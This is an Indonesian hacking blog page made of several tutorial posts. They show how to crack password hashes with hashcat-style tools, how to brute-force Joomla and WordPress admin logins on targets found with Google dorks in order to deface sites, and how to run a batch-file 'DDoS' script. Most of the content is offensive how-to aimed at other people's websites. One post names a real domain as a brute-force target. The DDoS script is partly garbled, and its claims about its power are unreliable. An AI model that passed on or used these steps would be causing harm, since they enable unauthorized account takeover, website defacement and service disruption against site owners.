Crack Semua Jenis Hash Menggunakan OclHashcat

Assalamualaikum...

Sebelumnya udah pernah membahas mengenai Tool untuk memecahkan kode2 hash baik dengan memanfaatkan wordlist maupun secara bruteforcing. kali ini hanya sedikit berbeda, tools ini sebenarnya masih ada kekerabatan dengan Hashcat, hanya saja oclhashcat terlihat lebih mumpuni dalam melakukan proses cracking Hash dari segi estimasi waktu dan kecepatannya. tidak seperti tools sebelumnya yang membutuhkan waktu yg cukup lama untuk mendapatkan hasil proses cracking hashnya. tapi untuk bisa menggunakan tools ini, dibutuhkan spesifikasi yang cukup tinggi juga, berhubung lappie saya spesifikasinya tidak mendukung, jadi saya tidak bisa mencobanya :3

Usage:

./oclHashcat-lite32.bin e10adc3949ba59abbe56e057f20f883e (linux)

oclHashcat-lite32.exe e10adc3949ba59abbe56e057f20f883e (windows)

Requirements:

• NVidia users require ForceWare 310.32 or later

• AMD users require Catalyst 13.1 -exact-

Algorithms

• MD5
• md5($pass.$salt)
• Joomla
• SHA1
• nsldap, SHA-1(Base64), Netscape LDAP SHA
• sha1($pass.$salt)
• nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
• Oracle 11g
• MSSQL(2000)
• MSSQL(2005)
• MySQL
• MD4
• md4($pass.$salt)
• NTLM
• Domain Cached Credentials, mscash
• SHA256
• sha256($pass.$salt)
• descrypt, DES(Unix), Traditional DES
• SHA512
• sha512($pass.$salt)
• Cisco-PIX MD5
• Double MD5
• vBulletin < v3.8.5
• vBulletin > v3.8.5
• IPB2+, MyBB1.2+
• LM
• Oracle 7-10g, DES(Oracle)
• SHA-3(Keccak)
• Half MD5
• NetNTLMv1-VANILLA / NetNTLMv1+ESS
• NetNTLMv2
• Cisco-IOS SHA256

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

 Content Creator : Onix AQua

Continue reading →

Joomla Bruteforce

Assalamualaikum...

Hai sobat, udah pada tau belum tentang bruteforce? :o kalo belum silahkan tanya karo mbah google, aku yo males arek tekok2 karo mbahku :3 hahaha... yo wes lah.. :p

Pada postingan sebelumnya saya sudah membahas mengenai brutefoce, tapi sekarang kasusnya berbeda. kalo sebelumnya bruteforce untuk CMS Wordpress, nah yang ini khusus untuk CMS Joomla :D

Toolsnya sendiri ini dibuat oleh om saya, tapi ga tau omnya yang mana :( cuma tau nicknya aja :D yah siapa yg kagak kenal sama om Hmei7 :D entahlah saya juga ga kenal, yang saya kenal cuma om Hiddenymei12,, wkwkwkwk :D v thanks to om Hmei7, ijin pinjem toolsnya :D (*biar ga kena kritik :D )

Lanjuut dah, sebelum coba2 siapin dulu bahan2nya:

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi, :)

Yah seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih maknyoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file listsite.txt, disini ane cuma satu aja, sekedar buat coba2 apakah toolsnya masih bekerja atau tidak. :p ya begitulah :p dan kalo list passwordnya mo dibanyakin juga boleh :p

Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat! lalu klik open! dan  klik Scan...

Tinggal nunggu hasilnya  :) yang sabar yah :p

Kalo udah nemu password yang cocok, tinggal login dah!

Nah ternyata toolnya masih bekerja dengan baik :)

Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan cuma enaknya doank, wkwkwk :D

Sekian tutorial ini, mudah2an bermafaat dan bisa menambah pengetahuan sobat semua :)

Content Creator: Onix AQua Menyapa ^_^

Continue reading →

Crack Hash Tanpa Wordlist | MD5 Bruteforce

Assalamualaikum...

Hayoo,, Siapa yg suka make SQL Injection? pasti kendalanya saat Crack password Hashnya kagak temu,, wkwkwk yang sabar yah, kalo ga bisa di crack ya udah tinggalin aja :p

Eiiit,, bentar dolo, ni ane punya tools buat crack Hash MD5 tanpa menggunakan wordlist, kali aja berguna :) jadi ga repot2 dah ngumpulin banyak wordlist ampe gigaan sizenya.. punya saya 1 GB wkwkk :p


MD5 Bruteforce | Download


kalo udah download langsung aja dah dibuka pake Terminal :) caranya liat gambar aja :)

Nah Selanjutnya kita masukkan perintahnya : md5.exe -h hashsobat -c karakter

Katerangan :

-c aA0~

a   set a untuk karakter huruf kecil
A   set A untuk karakter huruf kapital
0   set 0 untuk karakter angka / digit
~   set ~ untuk karakter simbol khusus

-C "abc23#"       karakter tambahan
-X "0D0A00"       karakter dalam bentuk Hex

usage:

md5.exe -h 827ccb0eea8a706c4c34a16891f84e7b -c 0

Selanjutnya tinggal nunggu hasilnya aja :)

Nah tuh,, udah ketemu passnya ga nyampe 1 detik :)

Catatan: dengan metode Bruteforce ini kemungkinan berhasil adalah 100%!! Hanya saja membutuhkan waktu yang lama. Lamanya proses cracking tergantung dari spesifikasi kompie/lappie sobat serta kombinasi password! Semakin rumit kombinasi passwordnya maka semakin lama pula proses cracking untuk mendapatkan hasilnya, bisa hanya sekitar 1 detik, 1 menit, 1 jam, 1 hari, 1 minggu, 1 bulan, bahkan bisa nyampe 1 tahun ? :o kecuali kalo sobat punya Super Komputer, apapun kombinasi passwordnya bisa sobat crack hanya memerlukan beberapa waktu aja :D

Yah begitulah, tak ada yang mudah dalam dunia hacking, tapi disitulah letak seni nya, semakin sulit maka akan semakin menarik :)


Sekian tutorial saya, moga bermanfaat aja :)


Content Creator : Onix AQua

Continue reading →

Crack Hash MD5(wordpress) dengan Hashcat

Assalamualaikum.. :)

Hay Sobat, ketemu lagi dahh :D Pernah liat yg seperti dibawah ini? :D

$P$B12345678SK.X5r1iISZN0baAvEvEj0
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.

Nah, ane sekarang mau share tentang trik bagaimana ngecrack password hash yang digunakan pada web yg menggunakan CMS Wordpress. Soalnya ane liat banyak sekali yang masih bingung bagaimana caranya bahkan ga tau sama sekali tentang password hash wordpress. berbeda dengan password hash MD5 rata2 tools decript/crack nya udah bertebaran dimana-mana baik offline maupun online. 

Saran ane kalo mau bisa crack password hash harus tau dulu jenis-jenis hash tersebut. silahkan sobat cari dah di google banyak berserakan :D banyak baca banyak ilmu :p

Cukup dah ngomel ngomelnya :D langsung ke TKP :D

Sediakan Bahan - Bahan :

1. Hashcat | Download Password: Lihat

2.Wordlist | Download | Download

3.Sedikit Otak, dan Kesabaran :p

Langkah - Langkah:


Pertama extrack file hashcat dan wordlist dipartisi disk yg sobat inginkan, kalo ane disini ane letak di partisi D:\ liat gambar baik2 tuh :D

Lalu buka Hashlist.txt dan masukkan Hash yg mau sobat crack, dan save lagi :D

Selanjutnya buka terminal command, cari aja di Start>Run>ketik cmd! dan enter!

Setelah terminal terbuka, posisikan directori ke folder D:\Hashcat. liat gambar!

Selanjutnya ketik perintah : hashcat-cli32.exe -m 400 hashlist.txt wordlist.txt  lalu enter!

Silahkan sobat tunggu beberapa tahun yah :D eh, beberapa saat :D tunggu ampe selesai aja ;)

Nah tuw, udah keluar hasilnya :


$P$B12345678SK.X5r1iISZN0baAvEvEj0:l4I2GL4HsK7Tw
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0:r3dm0nd_admin
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/:4dm!n_w38
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0:w38m45t3r
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.:!nd0n3s!4n_cy83r_4rmy

Note: "Biar lebih maknyoooss, banyakin aja wordlistnya :D punya ane ampe 1 GB :3"

Jika sobat ingin meggunakan perintah2 yg lain atau mau coba crack hash jenis yg lain, silahkan sobat ketik perintah :  hashcat-cli32.exe --help

Sekian tutorial singkat dari ane, kalo ada yg kurang mohon dikoreksi, ntar ane perbaiki :D

Wasalamualaikum..

Contet Creator: Onix AQua

Continue reading →

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

UPDATE: Link sudah diperbaiki... :)

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute

Lalu buka comand dengan cara : Klik Start>Run>ketik cmd

Biasanya posisi default directories di Cmd : C:\User\User_Name>

Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>

 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 

Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10

Lalu tekan enter!

Tunggu proses hingga selesai!

Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!

GoodLuck!! :D

Content Created By Onix AQua


tag : cara deface wordpress, brute attack wordpress, deface website mudah

Continue reading →

Down Server With DDoS

Kali ini saya akan mempraktekkan DDOS melalui Notepad. Langsung saja, berikut tutorialnya:

LANGKAH 1:  Copy code-code dibawah ini :

Code:

        @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    DOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2: Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3: Save file anda seperti dibawah :

File Name : DDoS Attack.bat Save As Type : All File <--- p="p" penting="penting">
    Quote: bisa disave dgn namafile bebas sesuka bro n sist..     tapi ingat , File Extensi harus berformat .Bat


Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target: Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :     Sebelum = http://www.google.com/     Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.     Setelah memasukkan url itu, tekan enter.


LANGKAH 4: Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- address="address" bagi="bagi" http:="http:" ip="ip" nbsp="nbsp" p="p" www.google.com="www.google.com">    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host: Masukkan saja ip address yg anda dapat tadi.

Contoh : ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size : Letakkan letakkan semau anda sebagai POWER !

Contoh : Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.

Sumber :: Cyber4rt.com

Continue reading →